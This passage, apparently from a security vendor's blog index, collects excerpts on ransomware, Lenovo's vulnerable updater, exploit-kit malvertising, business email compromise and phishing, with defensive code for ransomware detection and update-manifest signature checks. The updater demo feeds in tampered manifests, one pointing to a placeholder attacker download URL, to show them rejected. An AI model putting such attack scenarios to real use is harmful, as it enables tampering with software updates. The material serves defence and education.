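    for alert in detect_encryption_bursts(sample_events()):
        print(alert)
```

The entropy test is what separates the ransomware from a build job that also touches many files; tuning `window` and `min_files` against normal activity on the file server is what keeps the alert useful. Ransomware that encrypts only part of each file, and formats that are already high-entropy (compressed archives, images), are the known blind spots, which is why this belongs alongside backups rather than in place of them.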

Ransomware Protection Tips

There are a number of reasons why ransomware attacks have been increasing and why crypto-ransomware has now become one of the biggest and most worrying threats. However, the main reason is that ransomware is extremely profitable. How profitable? According to a recent security report from McAfee Labs, one single ransomware author managed to pull in an incredible $121 million in ransomware payments in the first six months of 2016. Take off the expenses incurred and the author cleared $94 million in profit. That was just one author, and there are many. There are now more than 200 different ransomware families and many more variants of each. Developing new ransomware from scratch is a complicated business that requires considerable programming skill, but unfortunately that is no longer a barrier: ransomware-as-a-service lets individuals with no such skill rent ready-made ransomware to run their own campaigns and hand the author a cut of the profits. The explosion in the use of ransomware in the past two years is a cause for concern for all Internet users, especially for business owners. Unfortunately, the ransomware crisis is unlikely to be resolved any time soon. As long as it is profitable, the attacks will continue. Vincent Weafer, VP of Intel Security's McAfee Labs, expects revenues from ransomware infections in 2016 to be of the order of several hundred million dollars, and most likely considerably more. McAfee recorded 1.3 million new ransomware samples in the first half of 2016. The risk of infection has increased as authors employ increasingly sophisticated methods of evading detection. Ransomware is also spreading faster and encrypting more data to ensure victims have no alternative but to pay up. But how is it possible to prevent ransomware attacks? Unfortunately, there is no silver bullet. Prevention requires several different strategies to be adopted. To prevent ransomware attacks, check out the ransomware protection tips below.
Ransomware Protection Tips

We have listed some ransomware protection tips below that will help you to avoid ransomware infections, and how to avoid paying a ransom should the unthinkable happen. The first rule of ransomware avoidance is backing up your data. The No More Ransom Project...

New Lenovo Bloatware Vulnerability Discovered

The security threat from bloatware was made abundantly clear last year with the discovery of a Lenovo bloatware vulnerability in the Superfish adware that came pre-installed on Lenovo laptops: Superfish installed its own root certificate, with the same private key on every affected machine, which allowed HTTPS traffic to be intercepted. Bloatware is a term used to describe software applications that are largely unnecessary yet are pre-installed on new computers and laptops. These programs can slow down computers and consume a lot of memory, yet offer the user little in the way of benefits. They are primarily used to update application features rather than to enhance security. Unfortunately, these pre-installed programs have been discovered, on numerous occasions, to contain security vulnerabilities that can be exploited by malicious actors and used for man-in-the-middle attacks. They can even let attackers run arbitrary code, escalate privileges, or push malicious software updates. Now a new Lenovo bloatware vulnerability has been uncovered. This time it concerns the company's software updater, which has been found to contain a vulnerability that could be exploited to conduct man-in-the-middle attacks.

New Bloatware Vulnerability Found in Lenovo Accelerator Application Updater: Uninstall Recommended

The Lenovo Accelerator Application has been pre-installed on a wide range of Lenovo desktop computers and notebooks shipped with Windows 10. In total, well over 100 different models of Lenovo notebooks and desktops have the Lenovo Accelerator Application installed. Lenovo says the application is used to speed up the launching of Lenovo applications and communicates with the company's servers to determine whether application updates exist. Its UpdateAgent component polls Lenovo's servers every 10 minutes to check whether updates have been released. However, the application has recently been discovered to contain a security vulnerability that could be exploited by attackers.
DuoLabs investigated a number of companies to check for security vulnerabilities in pre-installed software applications and found that Lenovo’s UpdateAgent was particularly vulnerable to attacks. DuoLabs reported that the updater had “no native security,” and that...
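
An updater of this kind is exposed to man-in-the-middle attacks when it fetches update metadata or binaries over a channel it does not authenticate and does not verify a signature on what it receives. The following is an added example, not Lenovo's code and not taken from the Duo Labs report, of the checks a client-side updater should make before running anything it downloaded. Host names, product and version numbers are hypothetical, and HMAC with a shared secret stands in for the vendor's signature so that the example runs with the standard library alone; a shipping updater must use an asymmetric signature (Ed25519 or RSA-PSS, for instance) so that the verification key on the client cannot be used to sign:

```python
"""Update-manifest verification for a software updater.

Added example, not Lenovo's code or anything from the Duo Labs report. Host
names, product names and the key are hypothetical. HMAC stands in for the
vendor's signature so the example runs with the standard library only; a real
updater must use an asymmetric signature so that the verifying key shipped on
the client cannot also be used to sign.
"""
import hashlib
import hmac
import json
from urllib.parse import urlparse

TRUSTED_HOSTS = {"updates.example-vendor.com"}     # hypothetical
VENDOR_KEY = b"demo-vendor-signing-key"            # hypothetical; see note above


class UpdateRejected(Exception):
    pass


def _canonical(manifest: dict) -> bytes:
    """Stable byte encoding so the signature covers exactly what is checked."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(manifest: dict, key: bytes = VENDOR_KEY) -> str:
    """Vendor side (build pipeline): sign the canonical manifest."""
    return hmac.new(key, _canonical(manifest), hashlib.sha256).hexdigest()


def verify_update(manifest: dict, signature: str, payload: bytes,
                  installed_version: tuple, key: bytes = VENDOR_KEY) -> dict:
    """Client side. Every decision below relies only on fields that the
    signature covers, so an on-path attacker who rewrites the manifest, the
    download URL, the version or the binary is rejected."""
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        raise UpdateRejected("manifest signature invalid")
    url = urlparse(manifest["url"])
    if url.scheme != "https" or url.hostname not in TRUSTED_HOSTS:
        raise UpdateRejected(f"untrusted download location {manifest['url']}")
    if tuple(manifest["version"]) <= tuple(installed_version):
        raise UpdateRejected("downgrade or replay of an older signed manifest")
    if not hmac.compare_digest(hashlib.sha256(payload).hexdigest(), manifest["sha256"]):
        raise UpdateRejected("payload hash does not match the signed manifest")
    return manifest


def try_update(manifest, signature, payload, installed_version) -> str:
    """Convenience wrapper returning 'accepted' or the rejection reason."""
    try:
        verify_update(manifest, signature, payload, installed_version)
        return "accepted"
    except UpdateRejected as exc:
        return str(exc)


def demo() -> dict:
    """Constructed scenario: one genuine update and four attacks on it."""
    payload = b"MZ\x90\x00 demo installer bytes"
    genuine = {"product": "UpdateAgent", "version": [2, 1, 0],
               "url": "https://updates.example-vendor.com/UpdateAgent-2.1.0.exe",
               "sha256": hashlib.sha256(payload).hexdigest()}
    sig = sign_manifest(genuine)
    rewritten = dict(genuine, url="http://198.51.100.7/UpdateAgent.exe")   # attacker edits URL
    plain_http = dict(genuine, url="http://updates.example-vendor.com/UpdateAgent-2.1.0.exe")
    return {
        "genuine": try_update(genuine, sig, payload, (2, 0, 0)),
        "swapped_binary": try_update(genuine, sig, b"MZ\x90\x00 attacker binary", (2, 0, 0)),
        "rewritten_manifest": try_update(rewritten, sig, payload, (2, 0, 0)),
        "http_even_if_signed": try_update(plain_http, sign_manifest(plain_http), payload, (2, 0, 0)),
        "replayed_old_manifest": try_update(genuine, sig, payload, (2, 1, 0)),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:22} {result}")
```

The order of the checks matters: the signature is verified first, and every later decision (download host, version, payload hash) reads only fields that the signature covers, so an on-path attacker cannot change what gets installed without also breaking the signature. The version comparison closes the replay case, where an attacker serves a genuinely signed but older manifest for a build with a known exploitable flaw.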

FBI Warns of Increase in Extortion Email Schemes

The Federal Bureau of Investigation (FBI) has issued a new security alert warning of a new wave of extortion email schemes. The alert was issued after its Internet Crime Complaint Center (IC3) started receiving multiple reports from individuals who had been threatened with the exposure of their sensitive data. Cybercriminals are quick to respond to large-scale data breaches and use the fear surrounding the attacks to scam individuals into paying ransoms, clicking on links to malicious websites, or opening infected email attachments. In recent weeks, the Internet has been awash with news reports of major data breaches that have hit networking sites and a number of popular Internet platforms. Major data breaches affected LinkedIn, MySpace, and Tumblr, and while the stolen data are old, hundreds of millions of individuals have been affected. These cyberattacks occurred in 2012 and 2013, although the data stolen in the attacks have just been listed for sale online. These major data breaches had gone undiscovered until recently.

Extortion Email Schemes Threaten Exposure of Sensitive Data

Due to the volume of logins that were exposed in these attacks and the popularity of the sites, many individuals may be concerned that their login credentials may have been obtained by hackers. Cybercriminals are taking advantage of this fear and are sending out huge volumes of spam emails advising individuals that their sensitive data have been obtained. In the emails, individuals are told that their name, address, telephone number, credit card details, and other highly sensitive data are being held and that they will be distributed to friends and family if a ransom is not paid. The attackers warn their victims that access to social media accounts has been gained and that the attackers have details of all of the victim's social media contacts.
The scammers are also threatening to email and mail out details of credit card transactions and internet activity to friends, family, and employers, suggesting that the payment to prevent this from happening will be much lower than the cost of a divorce, and low in comparison to the effect it will have on relationships with friends and on...

How to Reduce Risk of Malware Infections from Websites

To reduce the risk of malware infections from websites, you can avoid the types of sites that are commonly used by cybercriminals to infect visitors: pornography sites, torrent sites, and online marketplaces selling illegal medication, for example. However, while these sites are often compromised with malware or contain malicious code, they are far from the most common sites used by cybercriminals to infect visitors. The unfortunate reality is that browsing the Internet and only visiting what are perceived to be "safe sites" does not mean that you will not be exposed to malware, malicious code, and exploit kits. Hackers are increasingly compromising seemingly legitimate websites to redirect visitors to sites hosting exploit kits that download malware and ransomware. Two CBS-affiliated news websites were recently discovered to be hosting malicious adverts that redirect visitors to sites containing the Angler Exploit Kit. MSN has been found to host malvertising in the past, as has Yahoo. A study conducted by anti-virus company Symantec revealed that three quarters of websites contain security vulnerabilities that could potentially be exploited to infect visitors with malware.

High Profile Websites Compromised and Used to Deliver Ransomware to Visitors

This week, two more websites were found to have been compromised and used to infect visitors with malware. The celebrity gossip website PerezHilton.com may cause problems for celebrities, but this week it was also causing problems for its visitors. The site attracts millions of visitors, yet few would suspect that visiting it placed them at risk of having their computer files locked with file-encrypting ransomware. However, that is exactly what has been happening. Attackers inserted malicious code into an iframe on the site, which silently redirected visitors to a website hosting the Angler Exploit Kit.
Angler probes visitors' browsers for security vulnerabilities and exploits them to silently download a malware payload. In this case, the Angler Exploit Kit was used to push Bedep malware, which in turn silently downloaded CryptXXX ransomware onto the victims'...

Adobe and Microsoft Issue Updates to Address Actively Exploited Security Vulnerabilities

This week, Patch Tuesday saw updates issued to address actively exploited security vulnerabilities in Internet Explorer, along with a swathe of fixes for a number of other critical Microsoft security vulnerabilities. In total, Microsoft issued fixes for 51 vulnerabilities this week spread across 16 security bulletins, half of which were rated important and the other eight critical. The updates tackle vulnerabilities in Microsoft Edge and Internet Explorer, Windows, the Microsoft .NET Framework, and MS Office; however, it is the browser fixes that are the most important. These include actively exploited security vulnerabilities that can be used to compromise computers if users visit websites containing exploit kits. Security update MS16-051 tackles the CVE-2016-0189 zero-day vulnerability in Internet Explorer which, if exploited, would allow an attacker to gain the same level of privileges as the current user. If that user is an administrator, the flaw could be used to take control of the entire system: the attacker could install programs, create new accounts, or view, modify, or delete data. The vulnerability lies in the way the JScript and VBScript scripting engines handle objects in memory, and the update corrects that handling. The IE vulnerability was brought to Microsoft's attention by researchers at Symantec, who had discovered an active exploit being used alongside spear-phishing attacks in South Korea. Users were being directed to a website containing an exploit kit that had been updated to exploit the IE vulnerability. The MS16-052 security update tackles vulnerabilities in Microsoft Edge that similarly involve how objects in memory are handled. These two updates should be prioritized by sysadmins, although all of the updates should be installed as soon as possible. Even the vulnerabilities rated important could potentially be exploited and used to gain control of unpatched computers.
Bulletin MS16-064 is also a priority update; it patches critical vulnerabilities in Adobe Flash Player. Since Flash is embedded in both Edge and IE, Microsoft now issues updates to address Adobe Flash vulnerabilities. While these security flaws are not believed to...

WebTitan Cloud – Game Changing Web Security Service for MSPs

Finding a web security service for MSPs can be a time-consuming process. There are a number of solutions that allow MSPs to keep their clients protected from malware and reduce the risk from internal and external threats, yet many are far from ideal for use by MSPs. The ideal web security service for MSPs must have a relatively low cost of ownership. Clients may be more than willing to implement a web security service to deal with the growing range of web-borne threats, but the cost of implementation is a key factor. Many solutions offer all the necessary benefits for the client but are not practical for use by MSPs: the time taken to install web security solutions and configure them for each client can reduce profitability. The best web security service for MSPs needs to be easy to install and maintain, with a low management overhead. Low-cost solutions that are quick to install and easy to maintain allow MSPs to incorporate them easily into existing packages to create a more comprehensive Internet security service. This can increase the value provided to clients, boost client revenue, and help MSPs win more business and differentiate their company in the marketplace. The ideal web security service for MSPs is available as a white label. This allows the service to be easily incorporated into existing packages, and white labeling allows MSPs to strengthen their own brand image rather than promoting someone else's. Many providers of web security services for MSPs fall down on customer support. If any issues are experienced, it is essential that an MSP can provide rapid solutions, so industry-leading technical support is essential.

WebTitan Cloud – A Web Security Service for MSPs That Ticks All the Right Boxes

WebTitan Cloud is an enterprise-class web filtering solution for MSPs that can be used to enforce clients' acceptable use policies and control the content that can be accessed via their wired and wireless networks.
Our DNS-based web filtering solution allows organizations to prevent phishing, stop malware downloads, protect against ransomware and botnet infections, and block spyware and adware. Controls prevent the bypassing of the content filter by...

Angler Exploit Kit Strikes Again: News Websites Used to Infect Visitors With Malware

Over the past two weeks there have been three worrying instances of the Angler exploit kit being used to infect website visitors with malware and ransomware. Cybercriminals are increasingly using exploit kits to deliver their malicious payloads and all organizations need to be aware of the risk.

Why AUPs May Not Be Sufficient to Keep Networks Secure

Many companies advise employees, through an acceptable use policy (AUP), of the types of websites that can be accessed via work networks and which are forbidden. Typically, employees are banned from visiting pornographic websites, using the Internet to share copyright-protected material, installing shareware or other unauthorized software, and using unauthorized web applications and gaming sites. Employees are provided with a document which they are required to read and sign. They are informed of the actions that will be taken for breaching the rules: verbal and written warnings, for example, and in some cases instant dismissal. These AUPs are usually effective and employees do heed the warnings if they value their jobs. If an employee breaches the AUP and accesses pornography, for instance, action can be taken against that individual. It is probable that no harm will have been caused and the matter can be dealt with by HR. However, if an employee breaches the AUP and visits a website that has been compromised with malware, or installs shareware that includes malicious files, taking action against the employee will not undo the damage caused. To better protect networks, AUPs should be enforced with a technical control. By implementing a web filtering solution, HR departments can ensure that inappropriate website content is not accessed, while IT departments are spared from having to deal with malware infections. Even if AUPs are followed to the letter, malware may still be downloaded onto the network. The risk has recently been highlighted by two security incidents discovered in the past two weeks.
Legitimate Websites Compromised with Angler Exploit Kit

Last week, news emerged that a toy manufacturer's website had been compromised and was being used to infect visitors with malware. The website had been loaded with the Angler exploit kit and...

Do You Block File Sharing Websites to Stop Your Employees Infecting Your Network?

There are some very good reasons why you should block file sharing websites. These websites are primarily used to share pirated software, music, films, and TV shows. It would be unlikely for the owner of the copyright to take action against an employer for failing to prevent the illegal sharing of copyrighted material, but it is an unnecessary legal risk. However, the main risk from using these websites comes from malware. Research conducted by IDC in 2013 showed that out of 533 tests of websites and peer-to-peer file sharing networks, downloading pirated software resulted in spyware and tracking cookies being downloaded to users' computers 78% of the time. More worryingly, Trojans were downloaded with pirated software 36% of the time. A survey of IT managers and CIOs conducted at the time indicated that malware was installed along with the software 15% of the time. IDC determined that overall there was a one in three chance of infecting a machine with malware by using pirated software. Even visiting torrent sites can be harmful. This week Malwarebytes reported that visitors to The Pirate Bay were served malicious adverts. An advertiser used a pop-under to silently redirect users to a malicious site hosting the Magnitude exploit kit, which was used to download Cerber ransomware onto users' devices. A study conducted by UC San Diego involved testing pirated software downloads using VirusTotal, which checks files against 47 different anti-virus engines. The research team determined that 50% of pirated files were infected with malware. Dealing with malware from pirated software was determined to take around 1.5 billion hours per year. For businesses the cost can be considerable. IDC calculated the cost to enterprises to be around $114 billion in 2013 alone, and that was just for the clean-up. The cost of data breaches caused by illegal software installations was estimated to be in the order of $350 billion.
Time to Block File Sharing Websites?

Organizations can monitor devices and check for unauthorized software installations on individual devices; however, by the time a software installation has been discovered, malware is likely to...

How to Address the Risk of Insider Data Breaches

Organizations are investing in technology to ensure that perimeter defenses are not breached; however, it is also important to address the risk of insider data breaches. According to a recent report from Forrester, internal incidents were responsible for more than half of the data breaches suffered by firms. Cybercriminals have stepped up their efforts and are attacking organizations with increased vigor, but the report suggests that more than half of data breaches are caused by employee errors, oversights, and negligence. Employees are under increasing pressure to get more work completed in less time, which can easily lead to errors being made or shortcuts being taken. Employees may be security minded most of the time, but it is all too easy for sloppy data security practices to creep in. Even with the most robust perimeter security defenses in place, simple mistakes can lead to disaster.

Email Borne Attacks Are Still A Major Risk

During the past 12 months the volume of spam email has fallen considerably. This is partly due to law enforcement taking down major botnets and the increasing use of efficient spam filters. Even at the reduced volume, the threat from spam email is considerable. The Forrester report indicates that spam fell from almost 89% of all email in 2014 to 68% in 2015. However, over 91% of all spam emails contain a malicious link and 2.34% contain malicious email attachments. Cybersecurity awareness training has helped to mitigate the risk of insider breaches to some degree, but they are still occurring. Most employees now know not to open email attachments from people they do not know, but what about from people they do know? There has been an increase in business email compromise attacks in recent months. These attacks involve sending spam and phishing emails that appear to come from within the organization, either from a compromised internal account or from a spoofed internal address. Such emails are far more likely to result in malicious attachments being opened and links being clicked than emails from strangers.
All emails should be treated as suspicious and should be carefully checked, not only those from outside an organization. Employees are aware never to run an executable file that has been sent via email...

Manufacturing Company Cyberattacks on the Rise

The healthcare industry has had a hard time in recent months; however, it is far from the only industry being targeted by hackers. Manufacturing company cyberattacks are on the increase, and the industry is now second only to healthcare according to a new report from IBM X-Force Research. The manufacturing industry has replaced the financial sector as hackers attempt to gain access to intellectual property, which can be sold for large sums on the black market.

$400 Billion Worth of Intellectual Property Is Stolen from U.S. Companies Every Year

According to figures from the Federal Bureau of Investigation, each year over $400 billion worth of intellectual property is stolen from the United States and sold overseas. Many of the attacks are conducted by nation-state backed hacking groups, although other players have now got in on the act because of the value of the data and the relative ease of breaking through manufacturing company cybersecurity defenses. According to IBM's 2016 Cyber Security Intelligence Index, manufacturers in the automotive sector were most frequently targeted, accounting for 30% of manufacturing company cyberattacks. Chemical companies were the second most likely to be attacked. Not only are the potential rewards for successful manufacturing company cyberattacks high, the attacks are relatively easy to pull off. A successful attack on a company in the financial sector may be rewarding, but the defenses put in place to keep hackers at bay are usually far more robust than in less well regulated industries such as manufacturing. The manufacturing industry has been relatively slow to improve cybersecurity defenses. Organizations in the healthcare industry are required to comply with the Health Insurance Portability and Accountability Act, or HIPAA for short. HIPAA sets a number of minimum standards which must be met by all healthcare organizations.
Administrative, technical, and physical safeguards must be implemented to keep patient data protected. The legislation has forced healthcare companies to improve their cybersecurity defenses. Similarly, legislation has been introduced that requires organizations in...

Vulnerabilities in QuickTime for Windows Will No Longer be Fixed

Two new vulnerabilities in QuickTime for Windows have recently been discovered, but a patch to address the flaws will not be issued by Apple. Apple has taken the decision to deprecate QuickTime for Windows and has advised all Windows users to uninstall the software to prevent the vulnerabilities from being exploited. Apple intends to keep supporting the OS X version. The latest vulnerabilities in QuickTime for Windows (ZDI-16-241 and ZDI-16-242) are both heap corruption remote code execution vulnerabilities that allow an attacker to write data outside of an allocated heap buffer. The vulnerabilities could be exploited remotely, although user interaction is required: the target would have to open a malicious file or visit a malicious website. One of the vulnerabilities (ZDI-16-241) affects processing of the moov atom, while the other (ZDI-16-242) involves a flaw in atom processing more generally. Both allow data to be written outside of an allocated heap buffer by supplying an invalid index, which would allow code to be executed in the context of the QuickTime player process, that is, with the privileges of the logged-in user.

Latest Vulnerabilities in QuickTime for Windows Require Uninstallation of the Software

The discovery of the new vulnerabilities in QuickTime for Windows spells the end of the software for Windows users. Apple, Trend Micro, and US-CERT have all advised Windows users to uninstall QuickTime as soon as possible in order to stay protected. These two vulnerabilities are unlikely to be the last to be discovered, and leaving the software installed will place users at risk of attack. Exploits for the new vulnerabilities are not believed to have been developed yet, and no active attacks are understood to have been conducted, but it is only a matter of time before the vulnerabilities are added to exploit kits. Whenever a software developer takes the decision to stop supporting software it means users must find alternatives.
IT departments should ensure that all Windows machines have QuickTime uninstalled as soon as possible. Apple has decided to stop support for QuickTime for Windows as most media programs no longer use QuickTime to play common formats, while HTML...

Dramatic Rise In Business Email Scams Prompts FBI Warning

The dramatic rise in business email scams in the past 12 months has prompted the Federal Bureau of Investigation (FBI) to issue a new warning. Companies of all sizes are being targeted with business email compromise scams that relieve them of tens of thousands, if not hundreds of thousands or millions, of dollars. The FBI warns that scammers are now going to extraordinary lengths to fool company employees into transferring large sums of company funds into the hackers’ accounts. These attacks are far from the random email spam campaigns typically associated with email scammers. Companies are extensively researched, individual targets are identified, and carefully crafted emails are sent. A variety of social engineering techniques are employed to convince an individual in the company to make a sizeable bank transfer to the attacker’s account. There are two main variants of these business email scams. The first involves gaining access to the email account of the CEO or a senior executive in the company. This is usually achieved with a spear phishing campaign. This phase of the attack involves researching the company and identifying a target. That target is then sent a spear phishing email in order to obtain their email login credentials. Once access to an email account has been gained, existing emails are checked to determine the style of writing used by that individual – how they sign their emails, the terminology they use, and the level of familiarity they have with the second target: an individual who manages money or makes bank transfers for the company. An email is then sent from the executive’s email account requesting that a transfer be made. Account details are supplied, along with a reason for urgency and an explanation of why the request is being made.
Since the emails come from a known source within the company, and the terminology and style of the email match those typically received by the accounts department, the transfer is often made without being queried. Another variation on the same theme does not require access to an email account. Instead, a domain name is purchased that is virtually identical to that used by the target company, often with...

Many MSPs are Missing a Secret Ingredient to Boost Profits!

There are a number of ways for managed service providers to increase cash flow and boost profits. Efficiency can be improved, staff productivity can be increased, better margins achieved, and new in-house products developed. Unfortunately, all of these are easier said than done. The main ways to increase profits by a significant amount are to attract new customers and to increase the amount each existing client is spending. If only there were a secret ingredient that MSPs are missing that could help them win more business and get each client to spend more! The good news is that for many MSPs, there is such a product. Any MSP that has yet to include a web filtering service in its product portfolio could be missing out on substantial profits.

Web Filtering – An Easy Way for MSPs to Increase Profits
Filtering the Internet is now essential for many enterprises. In certain industries it is mandatory for companies to filter the Internet. They need to ensure sensitive data are protected and risk is effectively managed. Networks must be protected from attacks by hackers, and with an increasing number of web-borne threats, Internet usage policies alone are not sufficient to keep organizations protected. Those policies need to be enforced, and a web filter is the natural choice. In some industries, education for example, it is mandatory for the Internet to be filtered: minors must be prevented from accessing obscene website content or other material that could be harmful. Even when it is not mandatory to filter the Internet, it is often desirable. Hotels, restaurants, transport networks, airports, cafes, and coffee shops are choosing to implement controls to ensure all users enjoy a safe browsing experience. In business, productivity losses from Internet abuse can be considerable. If every employee wasted an hour each day on personal Internet use, the losses to a medium-sized company would be substantial.
Some studies suggest even more time than that is wasted by employees each day on non-work related Internet activities. Failure to filter the Internet can prove costly in many ways. For example, the accessing of adult content in the workplace can lead to the...

Olympic Vision Keylogger Used to Access Business Email Accounts

Web-borne attacks on enterprises are increasing, but it is important not to forget to protect against email attacks, as shown by a recent campaign using the Olympic Vision keylogger.

Olympic Vision Keylogger Used in Recent Business Email Compromise Attacks
The attackers behind the latest campaign are using the Olympic Vision keylogger to gain access to business email accounts. Trend Micro discovered the campaign and was able to trace the attacks and link them to two Nigerian cybercriminals. Trend Micro determined that the campaign has been conducted in 18 different countries, including the United States. Business email accounts contain a wealth of data which, in the wrong hands, could result in considerable damage to an enterprise. However, it is not only the data stored in email accounts that hackers want to obtain. The cybercriminal gang behind the latest attacks has a different purpose. The attacks are being conducted to gain access to business email accounts in order to send emails to accounts department employees instructing them to make bank transfers to the attackers’ accounts. Large transfers are often made following a business email compromise (BEC) attack. If hackers can gain access to the email account of a senior executive, they can use that account to send messages to members of staff in the accounts or billing departments requesting that transfers be made to the attackers’ bank accounts. BEC is a highly effective attack strategy. If an email is sent from a CEO to the accounts department requesting that an urgent transfer be made, many employees would not think twice before making the transfer as instructed. This social engineering technique takes advantage of the fact that many employees would not question a direct request from a CEO or senior account executive. The transfer is made and the attacker receives the funds, withdraws the money, and closes the account.
This often occurs before any red flags are raised, even when the transfer is for tens or hundreds of thousands of dollars.

Sophisticated Attacks Being Conducted Using Unsophisticated Malware
The Olympic Vision keylogger is not sophisticated malware. Once installed on a device...

Has Your Enterprise Implemented Social Media Usage Policies?

Enterprise social media usage policies have been introduced by only 54% of organizations, according to a recent social media research study conducted by Osterman Research. Social media use in the workplace has grown significantly in recent years, both personal use of social media sites and use of the platforms for business purposes. However, just over half of enterprises have implemented policies that limit or restrict use of the websites. Enterprises face a choice: allow use of the sites and accept that a considerable part of each employee’s day will be devoted to personal social media use, or put controls in place to limit that use. These can be restrictions on the times at which the sites can be accessed, the amount of time each employee is “allowed” to take as Facetime, or the actions that can be performed on social media sites. There are good reasons for not introducing social media usage policies. Some employers believe social media use can improve collaboration between employees and departments. Some believe it can help improve corporate culture and even lead to faster decision making. However, some studies suggest that employers lose more than an hour per employee each day to social media networks. Multiplied by the 500 or more employees in an organization, that represents a considerable productivity loss. Many employers do not mind a little time on social media sites each day, provided that usage is kept within reasonable limits. An employee cannot be expected to work productively for a full 8 hours a day, so allowing some social media time can help employees recharge before they get back to working at full speed. If an employee takes 5 minutes every hour to check their Facebook feed, it could actually increase the amount of work they get done each day.

Social Media Usage Policies Can Help Employers Manage Security Risk
Use of social media platforms is not only about time not spent working.
There is a security risk associated with the use of social media networks. That risk is considerable, and it is growing. The Osterman Research study revealed the risk of malware delivery...

How to Protect Networks from Ransomware

Ransomware is not new; however, cybercriminals have been using the malicious software with increased frequency in recent months as a surefire way of generating income. It is now essential to protect networks from ransomware due to the increased risk of attack.

What Is Ransomware?
Ransomware can be considered to be rogue security software. It uses the same encryption that companies are advised to use to protect their data from cyberattackers. It encrypts files to prevent them from being used or accessed. Encrypted files can only be unlocked with the corresponding decryption key. Attackers lock data and demand a ransom in exchange for that key. Without the key, the files will remain locked forever. It is therefore important for organizations to take steps to protect networks from ransomware. The threat of attack is increasing, and failure to take proactive steps to reduce risk could prove costly.

Why are Ransomware Infections Increasing?
Malware can be used to record keystrokes and obtain login credentials for bank accounts, or to create botnets that can be sold as a service. Corporate secrets can be sold to the highest bidder, or Social Security numbers, names, and dates of birth stolen and sold on to identity thieves. However, attacks of this nature take time and effort. Ransomware, on the other hand, gives criminals the opportunity to make a quick buck. Several hundred of them, in fact. If a cybercriminal can infect a single machine with ransomware and lock that device, a ransom of between $300 and $500 can be demanded. The ransom must be paid using the virtually anonymous Bitcoin currency. Bitcoin can be bought, sold, traded, and spent without having to disclose any identifying information. Cybercriminals are therefore able to demand ransoms with reasonable certainty that they will not be caught. Ransomware-as-a-service is being offered on underground networks, meaning cybercriminals do not need to be skilled hackers or programmers.
For a payment of between 5% and 20% of the profits and a nominal download fee, criminals are able to use the malware to generate a significant income. Ransomware is lucrative. One of the most sophisticated strains of ransomware, CryptoWall, has been...

IRS Warns of Wave of Tax Season Phishing Scams

Nothing is certain in life apart from death and taxes, and, it seems, tax season phishing scams, which have started particularly early this year. Inboxes are already being flooded with phishing emails as cybercriminals attempt to file tax returns early. Not their own tax returns, of course, but fraudulent returns on behalf of any email recipient who divulges their Social Security number and personal data to the scammers. Tax season phishing emails are sent out in the millions in the run-up to the April 15 deadline. If a fraudulent return claiming a refund is filed before the victim files their own, the criminals receive the refund check.

How to Spot Tax Season Phishing Scams
Each year tax fraudsters develop new and ever more convincing phishing scams to get taxpayers to divulge their personal data and Social Security numbers. With these data, fraudsters can submit fake tax returns in the names of the victims. While phishing emails can be easy to spot in some cases, the fraudsters are now getting much better at crafting official-looking emails that appear to have been sent from the IRS. The emails use the same language one would expect the IRS to use, and the email templates use official logos. The emails contain links that have been masked to make the recipient think they are being taken to an official website. Clicking on the link will open a browser window and the soon-to-be-victim will be taken to a website that looks official. Visitors will be asked to update their personal information, add their Social Security number, or even divulge their Self-Select PIN for the online tax portal. Divulging these data is almost certain to result in tax fraud.

Tax Season Phishing Emails Are A Growing Concern
Taxpayers have been warned to be ultra-cautious. More tax season phishing scams have been identified this year than in previous years, with tax-related phishing and malware scams up 400% year on year.
IRS Commissioner John Koskinen warned that “Criminals are constantly looking for new ways to trick you out of your personal financial information so be extremely cautious about opening strange emails.” Tax season phishing scams are not only conducted via...

Securing Wi-Fi Hotspots Can Give Your Company A Big Competitive Advantage

One of the main priorities for IT professionals in 2016 is securing Wi-Fi hotspots. The use of unsecured public Wi-Fi is notoriously risky. Cybercriminals spy on the activity taking place at WiFi hotspots, and it is at these Internet access points that many man-in-the-middle attacks take place.

The Dangers of Unsecured WiFi
Preventing employees from using personally owned and work devices on unsecured Wi-Fi networks is a major challenge, but one that must be met in order to keep work networks free from malware. When employees use smartphones, tablets, and laptops to connect to unsecured Wi-Fi networks, there is a high risk that those devices may be compromised. Hotspots are frequently used to deliver malware to unsuspecting website visitors, and malicious software can subsequently be transferred to work networks. With personally owned devices increasingly used for both private and work purposes, the risk of a work network malware infection is particularly high. The risks associated with unsecured Internet access points are well known, yet people still tend to engage in risky behavior when accessing the Internet via these wireless networks. In the rush to take advantage of free Internet access, basic security best practices are all too often ignored. Devices are allowed to connect to Wi-Fi hotspots automatically, and hotspots are not checked to find out whether they are genuine or have been spoofed.

Security Professionals Concerned About Employees’ Use of Unsecured WiFi Networks
A recent survey conducted by the Cloud Security Alliance indicates security professionals are very concerned about the use of unsecured WiFi networks. The Cloud Security Alliance is a collective of security professionals, businesses, and privacy and security organizations that are committed to raising awareness of cybersecurity best practices. The organization recently conducted a survey and asked 210 security professionals their opinions on the top threats to mobile computing in 2016.
2010 member organizations were polled, and more than 8 out of 10 respondents (81%) said that the threat from unsecured WiFi access points was very real and was one of the biggest mobile security risks...

Explosion in Malware Makes Web Filters for WiFi Networks Essential

Organizations running WiFi networks are facing attacks from all angles. Many companies are choosing to implement web filters for WiFi networks to help mitigate the risk from the growing number of malware variants being used to attack businesses via their WiFi networks. A new report issued by Bilbao-based antivirus software developer Panda Security has revealed the extent of the problem. Last year, over 84 million new malware samples were identified, which equates to 27% of all malware previously identified. The proliferation of malware has been attributed, in part, to the rise in use of antivirus software and the effectiveness of those programs. When a new malware sample is discovered, antivirus signatures are updated and shared with all antivirus software developers. In a very short space of time, all AV engines will block that particular malware. Hackers have responded by using software that modifies malware slightly, allowing hundreds or thousands of variants to be released. An increased number of malware variants are needed in order to get past antivirus software, as many AV engines are capable of detecting malware that has only been modified slightly. The more variants are used, the higher the probability of malware getting past security software. When Panda was formed in 1990, the company was detecting approximately 100 new malware variants a day. Today, 230,000 new samples are discovered every day on average. Trojans are the most common form of malware, with the full breakdown of new malware variants detailed below:

Malware Type   % of new malware discovered in 2015
Trojans        51.45%
Viruses        22.79%
Worms          13.22%
PUPs           10.71%
Spyware         1.83%

Blocking Malware with a Web Filtering Solution
Malware is installed on user devices via a variety of different vectors. Spam email is one of the most common methods of malware delivery but, fortunately, one of the most straightforward to block.
